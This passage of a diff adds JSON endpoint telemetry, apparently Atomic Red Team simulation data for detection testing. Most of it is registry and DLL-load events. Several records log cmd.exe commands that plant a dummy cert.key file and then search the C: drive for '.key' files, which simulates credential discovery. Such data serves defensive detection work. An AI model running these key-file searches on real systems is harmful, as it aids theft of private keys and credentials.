"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", 
+ "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "file", + "file_name": "NET.EXE-1DF3A2F6.pf", + "file_path": "C:\\Windows\\Prefetch\\NET.EXE-1DF3A2F6.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571010740000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "process", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "process", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2812, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571011820000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"echo \" \"ATOMICREDTEAM > %%windir%%\\cert.key\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3668, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571013970000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { 
+ "event_type": "file", + "file_name": "cert.key", + "file_path": "C:\\Windows\\cert.key", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "process", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7132, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571014100000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "ppid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}", + "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": 
"image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "command_line": "findstr /e .key", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7132, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "create", + "timestamp": 131883571014230000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}", + "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": 
"C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": 
"C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 